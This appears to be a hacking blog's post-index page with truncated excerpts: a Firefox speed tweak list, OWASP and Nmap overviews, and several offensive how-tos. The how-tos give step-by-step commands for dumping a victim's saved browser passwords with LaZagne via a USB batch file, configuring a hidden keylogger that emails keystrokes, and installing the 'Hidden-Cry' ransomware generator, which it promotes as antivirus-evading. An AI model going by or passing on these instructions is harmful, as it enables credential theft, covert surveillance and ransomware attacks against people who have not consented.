Posts

Making Firefox faster

Yes, firefox is already fast but did you know that you can tweak it and improve the speed even more?

That's the beauty of this program being open source.
Here's what you do:


In the URL bar, type “about:config” and press enter. This will bring up the configuration “menu” where you can change the parameters of Firefox.

Note:These are what I’ve found to REALLY speed up my Firefox significantly.These settings are optimized for broadband connections

Double Click on the following settings and put in the numbers below - for the true / false booleans - they’ll change when you double click.

Code:
browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 48
network.http.max-connections-per-server – 16
network.http.max-persistent-connections-per-proxy – 8
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300


One more thing… R…

Hacking passwords with USB? Extracting saved passwords by browsers? How to use LaZagne tool?

Hey Hackers! Today we will see how to use LaZagne tool and hack victim's passwords which are saved in browers. This tool can also be used as password recovery tool. Lets see how this works-

INSTALLATION-

Click on this link-https://github.com/AlessandroZ/LaZagne/releases/tag/0.9

Download the windows version, you can also go for linux version.

After you download, extract the file and you will find the LaZagne tool.

EXECUTING-

Now a command prompt window will open, now type  LaZagne.exe -h and press Enter.

Now open Notepad and type
laZagne.exe all > paswd.txt 

Save this and name it as run.bat

Now in the command prompt window type laZagne.exe all > paswd.txt  and press Enter.

Open the run.bat file using notepad and you will find all passwords which were saved in the browser.

To get this into USB, all you need to do is copy the run.bat file and paste it in USB and insert it in victim's pc and run the run.bat and you are done.

NOTE- But this tool only extracts passwords which are…

Free Keylogger? Using a ready keylogger? Configuring a ready keylogger?

Hey Hackers! Today lets see password hacking with ready keylogger works.If you dont know how to make a keylogger or you dont have linux, then still you can hack passwords by using a ready keylogger. Lets see how this works-

Download the keylogger from this site - https://free-keylogger.en.softonic.com/

After you download, open the setup file and install it.

Now you have successfully installed the keylogger.

Let's see how we configure it-

From the task bar in the hidden icons, open keylogger software.

Startup settings-

✓ Automatically start the program with Windows. 
✓ Start program in hidden mode. 

Invisibility settings-

Change the Hidden mode hotkey as set it at your own.

Monitoring-

✓ Keystroke logging 
✓ Copied texts 
✓ Web browsing 
✓ Running applications. 

Email Delivery- 

To enable this option you need to pay the company and buy the pro version of it. 
This will send all the passwords to the provided email.

Report for the picked date: 

Keystrokes and Clipboard- This will show the all…

OWASP TOP 10 APPLICATION SECURITY

OWASP TOP 10 APPLICATION SECURITY
The Open Web Application Security Project (OWASP) is a non-profit community helps organizations to develop secured applications. The OWASP Top 10 Web Application Security Risks was updated in 2017 to provide guidance to developers and security professionals on the most critical vulnerabilities that are commonly found in web applications, which are mostly found in web application.The list is usually refreshed in every 3-4 years.They come up with standards, freeware tools and conferences that help organizations as well as researchers.


The following identifies each of the OWASP Top 10 Web Application Security

1. Injection

Injection attacks occur when the user is able to input untrusted data tricking the application to execute unintended commands without proper authorization. Injections flaws can be – SQL injection, PHP injection, LDAP injection, Code injection and OS injection.

With a successful attack, an attacker can gain:
1. Unauthorized access to an …

Beginner's Guide: How to install a wireless adapter into kali linux?

Image
So, after buying a wireless adapter for hacking networks, you are probably thinking how to use it in kali linux. Fear not we are here to get you started.

Open your virtual box and select  your virtual machine.

Go into the settings.

Go into the usb option on the left hand side.
A page will open like this-


Now, press on the right most button which  looks like this-                  a usb with green plus sign.

Now insert your usb wireless adapter, you will see the name of the adapter appear in the box.

Select it .

Voila your usb wireless adapter is now added.

Remember: Always insert the wireless adapter into the usb after kali has been fully loaded. Sometimes when you insert before, the wireless adapter will not work because of system-system run error.


-Dhruv

How to decrypt MD5 hash? What is hash?

HOW TO DECRYPT A HASH? WHAT IS A HASH?
Hey hackers! So, lets begin with the topic: What is a hash? A hash is a function that converts one value to another.A hash function is a number generated from a string or text.
Hashing is the transformation of a string of characters into a usually shorter fixed length value or key that represents the original string.
What is Encryption and Decryption?Encryption: Conversion of human readable language to unreadable language by using encryption key.
Decryption: Conversion of human unreadable language to readable language by using decryption key.
How to decrypt a MD5 hash? Using this script you can do that easily, but remember that it would take time so, you need to have patience.
Open your terminal and paste this code:
git clone https://github.com/thelinuxchoice/md5decrypt.git
Then type this:
cd md5decrpyt
bash md5decrypt [paste your hash or file]
Now you need to wait! And your done!
Hope you enjoyed it and learned something new!
By: 4!_!54F








BEST OS FOR HACKING!! (TOP 5)

BEST OS FOR HACKING!!

1-KALI LINUX.
     -Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing, originally forked from Backtrack Linux by the Offensive Security team.

2-PARROT SECURITY OS.
     -Parrot is a GNU/Linux distribution based on Debian Testing and designed with Security, Development, and Privacy in mind.

3-BLACKARCH.
     -BlackArch Linux is an Small Arch Linux iconArch Linux -based distribution for penetration testers and security researchers.

4-BACKBOX LINUX.
     -BackBox is a Linux distribution based on Ubuntu developed to perform penetration tests and security assessments. Designed to be fast, easy to use and to provide a minimal yet complete desktop environment thanks to its own software repositories always been updated to the last stable version of the most known and used ethical hacking tools.

5-BLACKBUNTU.
     -Designed to be fast, easy to use and provide a minimal yet complete desktop environment. BlackBuntu Li…

WHAT IS NMAP USED FOR?

WHAT IS NMAP USED FOR?

-Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packetfliters/firewalls are in use, and dozens of other characteristics.

Ransomware

Image
RANSOMWARE

 An example lock screen


Please note that some of the terms used in this blog are made-up(they are only used for a better understanding of the user)
A ransomware is a type of a virus which locks a user out of his data until the user pays the creator of the ransomware.
Types of ransomware Scareware
The ransomware will show fake pop ups and will make you pay by giving false pop ups.Your data is normally safe,but you may be loaded with many pop ups.

Screen lockers
The ransomware will keep you away from your data until the ransom is paid.
Encryptors The ransomware will encrypt your data and not decrypt it until the ransom is paid .


Types of locks of the ransomware: Simple lock In this type of a lock, the user is locked out of its data by a plain lock page only. Once the lock page is bypassed, the user gets access to its data and can use it. Simple encryption lock In this type of a lock, the user is locked out of its data by a lock page and his data is encrypted. Once the lock is by…

Making a ransomware

How to build Ransomware?  I will show you how to build a ransomware using Hidden-Cry
Hidden-Cry is a script to generate a Windows Encrypter/Decrypter using AES encryption with a random 256-bit key. AES- Adanced Encryption Standard, it uses a symmetric-key algorithm, means the same key is used for encrypting and decrypting the data.  Hidden-Cry encrypts all personal files from Home directory (,txt, .doc, .xls, .mp3, .mp4, .pdf, .png and etc.)  It's Fully Undetectable (FUD) by Antiviruses. Works with Windows 10(requires Powershell 5)
NOTE- Don't Upload it on Virustotal, because they share results. 
Installing it on Kali Linux. >
$git clone https://github.com/thelinuxchoice/hidden-cry

$ cd hidden-cry
$ sudo apt-get update & apt-get install mingw-w64 -y
$ sudo chmod +x hidden-cry
$ sudo ./hidden-cry
And your done!! You have successfully installed it. 
Thank you for reading. Comment down your views and share it with everyone you can, so that even they should know about it. 

By…